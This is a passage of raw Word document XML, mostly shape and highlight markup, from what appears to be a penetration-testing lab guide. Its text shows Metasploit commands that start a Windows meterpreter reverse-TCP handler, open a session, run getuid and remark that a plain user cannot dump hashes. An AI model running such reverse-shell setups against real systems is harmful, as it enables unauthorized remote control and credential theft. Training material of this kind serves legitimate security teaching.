                        <wps:cNvPr id="11608" name="Shape 11608"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2470404" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2470404" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2470404" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2470404"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1609" name="Shape 11609"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="2327148" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2327148" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2327148" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2327148"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1610" name="Shape 11610"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="350520"/>
                            <a:ext cx="5433060" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5433060" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5433060" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5433060"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1611" name="Shape 11611"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="525780"/>
                            <a:ext cx="3576828" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3576828" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3576828" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3576828"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1612" name="Shape 11612"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="701040"/>
                            <a:ext cx="2916936" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2916936" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2916936" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2916936"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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="2C315252" id="Group 9661" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-26.1pt;width:427.8pt;height:69pt;z-index:-251652096" coordsize="54330,8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&#10;AAAAAA==&#10;">
                <v:shape id="Shape 11608" o:spid="_x0000_s1027" style="position:absolute;width:24704;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2470404,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g0UMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRCF7wX/QxjBi9SsUkS2RpFCscdqxfOYTDdL&#10;N5N1k67bf985CN5meG/e+2a9HUKjeupSHdnAfFaAIrbR1VwZOH29P69ApYzssIlMBv4owXYzelpj&#10;6eKND9Qfc6UkhFOJBnzObal1sp4CpllsiUX7jl3ALGtXadfhTcJDoxdFsdQBa5YGjy29ebI/x99g&#10;YGoP2vr+Ul3T9HOf6IXj2e6NmYyH3SuoTEN+mO/XH07w58tCeOUdmUF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oNFDEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l2470404,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2470404,175260"/>
                </v:shape>
                <v:shape id="Shape 11609" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:23271;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2327148,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YNMYA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS8SN2oxaapqxRRsKgHoxR6G7Jj&#10;EpqdDdk1xn/vFgre5vE+Z7boTCVaalxpWcFoGIEgzqwuOVdwOq5fYhDOI2usLJOCGzlYzJ96M0y0&#10;vfKB2tTnIoSwS1BB4X2dSOmyggy6oa2JA3e2jUEfYJNL3eA1hJtKjqNoKg2WHBoKrGlZUPabXoyC&#10;nfsavO1X2/L1Zs/6J53E7fc6Vqr/3H1+gPDU+Yf4373RYf5oGr3D3zvhBjm/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OYNMYAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m,l2327148,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2327148,175260"/>
                </v:shape>
                <v:shape id="Shape 11610" o:spid="_x0000_s1029" style="position:absolute;top:3505;width:54330;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="543306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2GSMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBDF78J+hzAL3jSNoEg1ihYWvPrn0tvQjG21&#10;mZQmq91vv3NY2NsM8+a999vuR9+pFw2xDWzBzDNQxFVwLdcWbtev2RpUTMgOu8Bk4Yci7Hcfky3m&#10;Lrz5TK9LqpWYcMzRQpNSn2sdq4Y8xnnoieV2D4PHJOtQazfgW8x9pxdZttIeW5aEBnsqGqqel29v&#10;oT/qsridu4e5PgK7+7Is1qa0dvo5HjagEo3pX/z3fXJS36yMAAiOzKB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NhkjEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l5433060,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5433060,175260"/>
                </v:shape>
                <v:shape id="Shape 11611" o:spid="_x0000_s1030" style="position:absolute;top:5257;width:35768;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3576828,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FbQsIA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+F3yHZQRvdZMioUZXUanQgpcaH2DIjtlo&#10;djZkNya+fbdQ6G0+vt9Zb0fbiAd1vnasIJ0nIIhLp2uuFFyK4+s7CB+QNTaOScGTPGw3k5c15toN&#10;/E2Pc6hEDGGfowITQptL6UtDFv3ctcSRu7rOYoiwq6TucIjhtpFvSZJJizXHBoMtHQyV93NvFQz9&#10;6WthbkWg3p5cZpaJ2RcfSs2m424FItAY/sV/7k8d56dZmsLvO/EGuf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sVtCwgAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m,l3576828,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3576828,175260"/>
                </v:shape>
                <v:shape id="Shape 11612" o:spid="_x0000_s1031" style="position:absolute;top:7010;width:29169;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2916936,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UyqscA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP30vDMBB+F/wfwg32Ii7tYEXqsjGUbTqmYBW2x7M5&#10;22Jz6ZK41f9+GQi+3cf386bz3rTiSM43lhWkowQEcWl1w5WCj/fl7R0IH5A1tpZJwS95mM+ur6aY&#10;a3viNzoWoRIxhH2OCuoQulxKX9Zk0I9sRxy5L+sMhghdJbXDUww3rRwnSSYNNhwbauzooabyu/gx&#10;Cuy6Wr26ZPc42W833eqmOLx8PmdKDQf94h5EoD78i//cTzrOT7N0DJd34g1yd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C1MqrHAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m,l2916936,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2916936,175260"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> msf6 exploit(multi/handler) &gt; set LHOST 10.0.2.15 msf6 exploit(multi/handler) &gt; exploit -j -z </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Exploit running as background job 0. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Win_User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-PC\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Win_User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As a user, you don’t have privileges to dump hashes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19203</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4139184" cy="350520"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9662" name="Group 9662"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4139184" cy="350520"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4139184" cy="350520"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11613" name="Shape 11613"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4139184" cy="175259"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4139184" h="175259">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4139184" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4139184" y="175259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="175259"/>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1614" name="Shape 11614"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175259"/>
                            <a:ext cx="42672" cy="175261"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="42672" h="175261">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="42672" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42672" y="175261"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="175261"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="FFFF00"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="10A6A94F" id="Group 9662" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:1.5pt;width:325.9pt;height:27.6pt;z-index:-251651072" coordsize="41391,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062gIAAMUJAAAOAAAAZHJzL2Uyb0RvYy54bWzsVktu2zAQ3RfoHQjtG0mO7SRC7CyaJpui&#10;LZr0AAxFfQCKJEjGsm/f4Uik5ARIgxRtN/VCosj5vpk35uXVvhNkx41tldwk+UmWEC6ZKltZb5If&#10;9zcfzhNiHZUlFUryTXLgNrnavn932euCL1SjRMkNASPSFr3eJI1zukhTyxreUXuiNJdwWCnTUQef&#10;pk5LQ3uw3ol0kWXrtFem1EYxbi3sXg+HyRbtVxVn7mtVWe6I2CQQm8OnweeDf6bbS1rUhuqmZWMY&#10;9A1RdLSV4DSauqaOkkfTPjPVtcwoqyp3wlSXqqpqGcccIJs8e5LNrVGPGnOpi77WESaA9glObzbL&#10;vuy+GdKWm+RivV4kRNIOqoSOCe4AQL2uC5C7NfpOfzPjRj18+Zz3len8G7Ihe4T2EKHle0cYbC7z&#10;04v8fJkQBmenq2y1GLFnDRTomRprPr2smAa3qY8uBtNraCM7IWV/D6m7hmqOBbAegRGpPF/npwEq&#10;FCHDFkKDkhEoW1jA7E0o5WerxerCd2hMlhbs0bpbrhBvuvtsHRxD15VhRZuwYnsZlgZo8CIBNHVe&#10;z5vyS9LPCtYArYdI/HGndvxeoaB7UjWIcjoVci4Vqx8aA2SDRHhrtDeXPAIgiIX3IA6UBpOvFsSe&#10;i75h4bNFfCMCsDnHWEgPBrhhFKZTJahDmnetg7El2g6cL86ybDIM1nwTDlXHlTsI7gET8juvgGpI&#10;Eb9hTf3wURiyo3444W+sNop6kaoVImrl6PpI6wZ+0fko7PU4jr6omQ2abHQ4zD+YIpBXmIKQd1RC&#10;z0q6qC9hdmNos4T88kGVB5wImDMQzw+Lv8RAmCXDsJoYuPQx+gCAq69l4NQ7AECYOYv1GcxCP6r8&#10;8Tr/ZyQcAhkpCHH4ykwkm3MgdOB0esyU5WDq1wSMckepB2PhPXf9asEQ42DkP/3+AP3w7xDuCjjU&#10;xnuNv4zMv3FETbev7U8AAAD//wMAUEsDBBQABgAIAAAAIQCx91mk3AAAAAUBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI9Ba8JAEIXvBf/DMkJvdRMlImkmItL2JIVqofS2JmMSzM6G7JrEf9/pqT09hje8&#10;971sO9lWDdT7xjFCvIhAEReubLhC+Dy9Pm1A+WC4NK1jQriTh20+e8hMWrqRP2g4hkpJCPvUINQh&#10;dKnWvqjJGr9wHbF4F9dbE+TsK132ZpRw2+plFK21NQ1LQ2062tdUXI83i/A2mnG3il+Gw/Wyv3+f&#10;kvevQ0yIj/Np9wwq0BT+nuEXX9AhF6azu3HpVYsgQwLCSkTMdRLLjjNCslmCzjP9nz7/AQAA//8D&#10;AFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIQb/TraAgAAxQkAAA4AAAAAAAAAAAAAAAAALgIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALH3WaTcAAAABQEAAA8AAAAAAAAAAAAAAAAANAUA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAA9BgAAAAA=&#10;">
                <v:shape id="Shape 11613" o:spid="_x0000_s1027" style="position:absolute;width:41391;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4139184,1752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SZcsQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPyxS8FN3EgpToKkUb0JP4QK9Ddtyk&#10;zc6m2TWm/94tFHqbj+8582Vva9FR6yvHCtJxAoK4cLpio+B0zEdvIHxA1lg7JgU/5GG5GDzNMdPu&#10;znvqDsGIGMI+QwVlCE0mpS9KsujHriGO3NW1FkOErZG6xXsMt7WcJMlUWqw4NpTY0Kqk4utwswry&#10;j1X+/bI1l6PdnLFe48587julhs/9+wxEoD78i//cGx3np9P0FX7fiTfIx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EmXLEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l4139184,r,175259l,175259,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4139184,175259"/>
                </v:shape>
